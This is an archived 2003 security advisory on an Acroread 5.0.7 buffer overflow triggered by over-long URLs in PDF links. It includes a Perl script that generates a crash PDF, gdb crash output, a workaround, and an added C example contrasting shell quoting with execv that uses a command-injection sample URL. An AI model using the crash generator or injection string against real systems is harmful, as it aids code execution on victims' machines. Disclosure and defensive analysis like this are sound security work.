Acroread 5.0.7 buffer overflow

From: Paul Szabo (pszat_private)
Date: Wed Jul 09 2003 - 15:34:17 PDT

    I. BACKGROUND
    
    Acroread from http://www.adobe.com is the pre-eminent PDF file viewer. The
    latest version, Acroread 5.0.7 for Linux, was released on 17 June 2003.
    
    II. DESCRIPTION
    
    Despite recent security fixes, an exploitable buffer overflow with
    over-long URL strings in web links remains. The overflow occurs when the
    link is clicked, and allows execution of arbitrary code. Acroread versions
    5.0.7 and 5.0.5 were tested on Debian (woody) Linux; other acroread 5.*
    versions on other UNIX platforms are expected also to be vulnerable. (To
    reproduce, configure Netscape as your browser, and do not have Netscape
    running at the time you click: the crash is in the code that starts it.)
    
    III. ANALYSIS
    
    Produce a suitable test file with pdflatex, e.g. using this script:
    
    #!/usr/bin/perl --
    #
    # Demo for acroread 5.0.7 on Debian Linux: build a PDF whose single
    # mailto: link carries an over-long URL (504 filler bytes followed by
    # 4 bytes that end up in a pointer; gdb shows 0x41414141).
    #
    use strict;
    use warnings;

    print "Writing TeX file ...\n";
    # For acroread 5.0.5 use 248 Bs instead of 504
    my $url = 'mailto:X' . ("B" x 504) . ("A" x 4);
    open(my $tex, '>', 'attack.tex') or die "attack.tex: $!";
    print $tex '
    \documentclass[11pt]{letter}
    \usepackage{times}
    \usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref}
    \begin{document}
       \href{', $url, '}
       {\texttt{mailto:X("B"x504).("A"x4)}}
    \end{document}
    ';
    close $tex;
    #
    print "Running pdflatex ...\n";
    system('pdflatex', 'attack') == 0 or die "pdflatex failed: $?";
    #
    #!#
    
    Acroread has a signal handler and may not visibly crash when the link is
    clicked, but under gdb the fault shows:
    
    (gdb) run attack.pdf
    Starting program: /Acroread507/Reader/intellinux/bin/acroread attack.pdf
    Program received signal SIGSEGV, Segmentation fault.
    (gdb) where
    #0  0x40f50513 in mdNetscapeFront ()
       from /Acroread507/Reader/intellinux/plug_ins/wwwlink.api
    Cannot access memory at address 0x41414141
    
    IV. WORKAROUND
    
    Remove the file .../Reader/*/plug_ins/wwwlink.api (the weblink plug-in;
    this disables web links altogether).
    
    V. EXPLOIT
    
    Censored. Fully working exploit sent to CERT.
    
    VI. COMMENTS
    
    Acroread 5.0.7 for Linux was released on 17 June 2003, and the README file
    contains:
       New for Acrobat Reader 5.0.7
       A security patch was applied that solves the problem reported in
       CERT vulnerability 200132 whereby a weblink could execute shell 
       commands.
    Acroread still uses 'sh -c' via system(3), but now disallows embedded single
    quotes, replaces dollar ($) and backquote (`) by %24 and %60 in the URL, and
    then wraps the URL in single quotes, producing a command line like
      sh -c DISPLAY=DISPL BROWSER 'URL'
    It seems that when given the example exploit, in a knee-jerk reaction Adobe
    encoded the "special" characters used. When told that the "shell
    meta-character soup" was larger, they quoted the URL and, seeing that
    encoding did not work, courageously banned embedded quotes, but were too
    lazy to remove the encoding. They should have replaced system(3) with
    fork/setenv/execv instead.
    The lengthening of the URL string prompted me to check how acroread handles
    long replacements, but even "plain" long strings cause it to fail.
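
    As an added example (not Adobe's code and not part of this advisory) of
    the two approaches contrasted above, and of the bounded copy that the
    long-URL crash in section III calls for: build_cmd_507() reconstructs,
    from the description here, the 5.0.7 filter (refuse embedded single
    quotes, encode $ and ` as %24 and %60, single-quote the URL into a
    'sh -c' command line), with a length check added; spawn_browser() is the
    fork/setenv/execv alternative, with the child's stdout captured through a
    pipe so the caller can see the exact bytes the browser receives. CMD_MAX,
    the function names, the use of /bin/echo as a stand-in browser and the
    sample URL are all assumptions made for the demonstration; the advisory
    does not give wwwlink.api's internals.

```c
/*
 * Added example, not Adobe's code and not from the advisory.
 *
 *   build_cmd_507()  reconstructs the 5.0.7 "sh -c DISPLAY=DISPL BROWSER 'URL'"
 *                    approach as described: reject embedded single quotes,
 *                    encode $ and ` as %24 and %60, single-quote the result.
 *                    Unlike mdNetscapeFront() it bounds every copy.
 *   spawn_browser()  fork/setenv/execv: no shell ever parses the URL.
 *
 * CMD_MAX is an assumed size; the real buffer size in wwwlink.api is not
 * stated in the advisory.
 */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define CMD_MAX 512   /* assumed, not the real size */

/* Returns 0 and fills cmd on success, -1 if the URL contains a single quote
 * or the encoded command line would not fit. */
int build_cmd_507(const char *display, const char *browser, const char *url,
                  char *cmd, size_t cmdlen)
{
    char enc[CMD_MAX];
    size_t n = 0;

    for (const char *p = url; *p; p++) {
        const char *rep = NULL;
        if (*p == '\'')
            return -1;                 /* embedded quote: refused outright */
        if (*p == '$')  rep = "%24";
        if (*p == '`')  rep = "%60";
        size_t need = rep ? strlen(rep) : 1;
        if (n + need >= sizeof enc)
            return -1;                 /* bounded: a long URL cannot overflow */
        if (rep) { memcpy(enc + n, rep, need); n += need; }
        else     enc[n++] = *p;
    }
    enc[n] = '\0';

    int w = snprintf(cmd, cmdlen, "DISPLAY=%s %s '%s'", display, browser, enc);
    if (w < 0 || (size_t)w >= cmdlen)
        return -1;                     /* truncated: refuse rather than run */
    return 0;
}

/* Runs browser with the URL as one argv element and DISPLAY set only in the
 * child's environment.  Captures the child's stdout into out (NUL terminated)
 * and returns the number of bytes read, or -1 on error. */
ssize_t spawn_browser(const char *browser, const char *display,
                      const char *url, char *out, size_t outlen)
{
    int fd[2];
    if (pipe(fd) < 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)browser, (char *)url, NULL };
        close(fd[0]);
        dup2(fd[1], STDOUT_FILENO);
        close(fd[1]);
        setenv("DISPLAY", display, 1);
        execv(browser, argv);          /* the URL is data, never parsed */
        _exit(127);
    }
    close(fd[1]);

    size_t total = 0;
    ssize_t r;
    while (total + 1 < outlen &&
           (r = read(fd[0], out + total, outlen - 1 - total)) > 0)
        total += (size_t)r;
    out[total] = '\0';
    close(fd[0]);

    int status;
    waitpid(pid, &status, 0);
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return (ssize_t)total;
}

int main(void)
{
    char cmd[CMD_MAX], got[256];
    const char *soup = "mailto:x$(id)`id`";   /* constructed sample URL */

    if (build_cmd_507(":0", "netscape", soup, cmd, sizeof cmd) == 0)
        printf("5.0.7 style: %s\n", cmd);
    /* /bin/echo stands in for the browser so the bytes it got are visible */
    if (spawn_browser("/bin/echo", ":0", soup, got, sizeof got) > 0)
        printf("execv style, browser saw: %s", got);
    return 0;
}
```

    Run it on a URL containing $(...) and backquotes and compare the two
    outputs: the 5.0.7 path still produces a command line that a shell will
    parse, and it has to refuse any URL containing a single quote at all; the
    execv path hands the same bytes through untouched with no shell involved,
    and an over-long URL can only be rejected, never overflow anything,
    because nothing is copied into a fixed buffer on the way to the browser.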
    
    The 5.0.7 README file also contains:
       New for Acrobat Reader 5.0.6
       A security patch was applied that solves the problem reported in
       http://online.securityfocus.com/archive/1/278984 where opening
       the font cache when the application starts up can unintentionally 
       cause the permissions of other files to change.
    and I confirm that this is solved in 5.0.7.
    
    The changes from 5.0.5 to 5.0.7 are in libCoolType.so, EScript.api and
    wwwlink.api only, so acroread 5.0.7 still announces itself, on the splash
    screen and in Help AboutAcrobatReader, as 5.0.5. CoolType was for 5.0.6,
    wwwlink for 5.0.7; is EScript for http://www.kb.cert.org/vuls/id/184820
    though that was meant to affect "full" acrobat only?
    
    Acroread versions 4.* do not seem vulnerable to the buffer overflow, as they
    chop the URL string after 1025 (!!??) bytes; but they are vulnerable to the
    "shell meta-character soup" (and could be protected with the workaround
    referenced below).
    
    VII. TIMELINE
    
    13 Jun 2003  -10day advisory released
    17 Jun 2003  Acroread 5.0.7 for Linux released
    23 Jun 2003  iDefense and CERT alerted to buffer overflow
    26 Jun 2003  Fully working exploit sent to iDefense
     1 Jul 2003  team@sec-labs.hack.pl finds same vulnerability
     9 Jul 2003  iDefense does not offer payment
    
    VIII. REFERENCES
    
    CERT vulnerability note
      http://www.kb.cert.org/vuls/id/200132
    
    -10Day CERT Advisory on PDF Files (note that the workaround in the latter
    message does not protect against the buffer overflow)
      http://lists.netsys.com/pipermail/full-disclosure/2003-June/010397.html
      http://lists.netsys.com/pipermail/full-disclosure/2003-June/010417.html
    
    Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
    (public report of the same vulnerability)
      http://www.securityfocus.com/archive/1/327335
      http://www.securityfocus.com/archive/1/328472
    
    IX. AUTHOR
    
    Paul Szabo - pszat_private  http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics  University of Sydney   2006  Australia
    
    This archive was generated by hypermail 2b30 : Thu Jul 10 2003 - 10:29:53 PDT